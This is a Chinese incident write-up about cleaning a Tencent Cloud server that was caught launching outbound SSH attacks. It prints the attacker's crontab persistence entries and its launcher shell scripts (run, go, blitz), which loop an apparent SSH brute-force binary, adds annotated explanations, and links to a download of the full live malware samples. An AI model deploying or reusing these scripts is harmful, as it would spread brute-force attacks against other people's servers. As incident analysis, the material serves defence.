【对外攻击行为】排查解决腾讯云服务器存在对外攻击行为,已阻断该服务器对其他服务器端口(TCP:22)的访问

解决方法来自腾讯客服

腾讯客服的回复:“https://cloud.tencent.com/document/product/296/9604 ——这是我们给您的建议,建议您排查一下您的服务器情况。”

 

先执行 crontab -l 查看 root 的计划任务。下面的结果里有两条 @reboot 项和三条定时项,都指向 /root/.configrc4 和 /tmp/.X291-unix 下的隐藏目录:这意味着只杀掉进程是不够的,必须同时删除这些计划任务和它们指向的目录,否则重启或到点后会再次被拉起。

[root@VM-0-14-centos c]# crontab -l
# [review] Persistence: the two @reboot entries re-launch the payloads on every
# boot, so killing the running process alone does not clear this infection.
# 01:01 every 2nd day
1 1 */2 * * /root/.configrc4/a/upd>/dev/null 2>&1
@reboot /root/.configrc4/a/upd>/dev/null 2>&1
# 08:05 every Sunday
5 8 * * 0 /root/.configrc4/b/sync>/dev/null 2>&1
@reboot /root/.configrc4/b/sync>/dev/null 2>&1
# 00:00 every 3rd day; note the hidden dot-directory under /tmp (contents shown below)
0 0 */3 * * /tmp/.X291-unix/.rsync/c/aptitude>/dev/null 2>&1

查看最后一条计划任务指向的脚本内容(它藏在 /tmp 下一个名为 .X291-unix 的隐藏目录里,看起来是在模仿 X11 的 /tmp/.X11-unix 目录以降低被注意到的概率):

[root@VM-0-14-centos c]# cat /tmp/.X291-unix/.rsync/c/aptitude
#!/bin/sh
# [review] Cron entry point (the "0 0 */3 * *" crontab line): change into the
# hidden toolkit directory and hand off to ./run (listed further down).
# `&>` is a bash redirection, not POSIX sh: on a dash-style /bin/sh this line
# appears to parse as `./run &` followed by a bare `>/dev/null`, i.e. run is
# backgrounded with its output NOT redirected; on bash-as-sh (the usual CentOS
# setup) both stdout and stderr go to /dev/null.
cd /tmp/.X291-unix/.rsync/c
./run &>/dev/null

 

cat run 显示如下内容(它根据 CPU 核数和架构决定是否拉起同目录下的 ./go;脚本里引用的 ./stop、./go、./golan 都是同目录的其他文件,本文未贴出):

#!/bin/bash
# [review] Launcher stage of the dropped toolkit. Decides whether to start
# ./go (the attack loop) based on CPU count and architecture. ./stop, ./go
# and the commented-out ./golan are sibling files not shown on this page.
PR=1
# Number of "model name" lines in /proc/cpuinfo, i.e. the logical CPU count.
PR=$(cat /proc/cpuinfo | grep model | grep name | wc -l)

ARCH=`uname -m`
if [ "$ARCH" == "x86_64" ]; then
        # Fewer than 7 CPUs: run ./stop, wait a random 0-239 s (jitter,
        # presumably to avoid synchronised bursts across infected hosts)
        # and then start ./go detached from the terminal.
        if [ $PR -lt 7 ]; then
                sleep 15
                ./stop
                sleep 3
                RANGE=240
                s=$RANDOM
                let "s %= $RANGE"
                sleep $s
                #nohup ./golan >>/dev/null &
                #sleep 20m && 
                nohup ./go >>/dev/null &
        fi
        # More than 7 CPUs: every action in this branch is commented out,
        # so it only sleeps. Exactly 7 CPUs matches neither branch and
        # starts nothing.
        if [ $PR -gt 7 ]; then
                #sleep 15
                #./stop
                sleep 3
                #nohup ./golan >>/dev/null &
        fi
else
        # Any non-x86_64 architecture: start ./go immediately, with no
        # ./stop call and no jitter.
        #nohup ./golan >>/dev/null &
        #sleep 20m && 
        nohup ./go >>/dev/null &
fi

查看 go 脚本(这是真正的攻击循环:它在死循环中反复调用 ./blitz,并根据每一轮的耗时动态下调线程数):

[root@VM-0-14-centos c]# cat go
#!/bin/bash
# [review] Attack loop of the dropped toolkit. Repeatedly runs ./blitz (a
# wrapper around the blitz32/blitz64 binaries, listed below) with a thread
# count chosen by architecture, and backs the thread count off when a round
# ends suspiciously fast. ./stop is a sibling file not shown on this page.
dir=`pwd`
cd $dir

# Default worker count; lowered for ARM, bumped by one for 32-bit x86.
threads=515

ARCH=`uname -m`
if [[ "$ARCH" =~ ^arm ]]; then
        threads=75
fi

if [[ "$ARCH"  == "i686" ]]; then
        threads=516
fi

# Counts rounds that finished in under 180 s (see the check below).
cont=1

                # Infinite loop with no break: the trailing `exit 0` is
                # unreachable, and the script only ends if something
                # external (presumably ./stop) kills it.
                while :
                do
                start=$(date +%s)
                touch v
                # Scrub work files from the previous round. p and ip are
                # deleted here yet passed to ./blitz below, so blitz must
                # (re)create them itself -- cannot tell from here what they hold.
                rm -rf p
                rm -rf ip
                rm -rf xtr*
                rm -rf a a.*
                rm -rf b b.*
                # "257.287.563.234" is not a valid IPv4 address (octets exceed
                # 255). It and a fixed token are appended twice per round to
                # c and d; purpose unclear -- possibly markers consumed by blitz.
                echo "257.287.563.234" >> c
                echo "257.287.563.234" >> c
                echo "sdaferthqhr34312asdfa" >> d
                echo "sdaferthqhr34312asdfa" >> d

                # 1-30 s of jitter, then one blitz run capped at 6 hours.
                sleep $[ ( $RANDOM % 30 )  + 1 ]s
                timeout 6h ./blitz -t $threads -f 1 -s 12 -S 8 -p 0 -d 1 p ip
                sleep 3
                end=$(date +%s)

                # A round shorter than 180 s is treated as a failure: shed
                # 50 threads and count it. Below 80 threads, or after more
                # than 6 such rounds, call ./stop (the loop itself does not
                # exit here).
                if [[ $(($end-$start))  -lt "180" ]]; then
                        let threads=threads-50
                        let cont=cont+1
                        if [[ $(($threads))  -lt "80" ]]; then
                                                ./stop
                        fi
                        if [[ $(($cont))  -gt "6" ]]; then
                                                ./stop
                        fi
                fi

                # Cleanup. Note the last line removes every /tmp entry whose
                # name starts with "t", not only this toolkit's own files.
                rm -rf xtr*
                rm -rf ip
                rm -rf p
                rm -rf .out
                rm -rf /tmp/t*
                done
exit 0
[root@VM-0-14-centos c]# cat blitz
#!/bin/bash
# [review] Architecture dispatcher for the blitz binaries (the actual attack
# tool; the binaries themselves are not shown on this page). Runs blitz32 on
# i686 and blitz64 on x86_64, forwarding all arguments via unquoted $*, so
# arguments containing spaces would be re-split. Any other architecture
# matches no branch and the wrapper exits 0 having done nothing -- notably
# ARM, even though the go script above still invokes it there with threads=75.
SCRIPT_PATH=$(dirname $(readlink -f $0))
ARCH=`uname -m`
if [ "$ARCH" == "i686" ]; then
        $SCRIPT_PATH/blitz32 $*
elif [ "$ARCH" == "x86_64" ];   then
        $SCRIPT_PATH/blitz64 $*
fi

 

再执行 netstat -ano | egrep "tcp|udp" 查看当前的网络连接(建议改用 netstat -anop 或 ss -tnp,加上 -p 才能看到发起连接的进程,便于对应到上面的 blitz 进程)。

 

完整的攻击代码已被我保存,空了的时候再研究一下这些坏人是怎么做的!!

下载地址(注意:压缩包内是真实的恶意样本,请只在隔离的分析环境里解压和查看,切勿在生产机器上执行其中任何脚本或二进制):

https://www.aliyundrive.com/s/sS87xUzEmPP
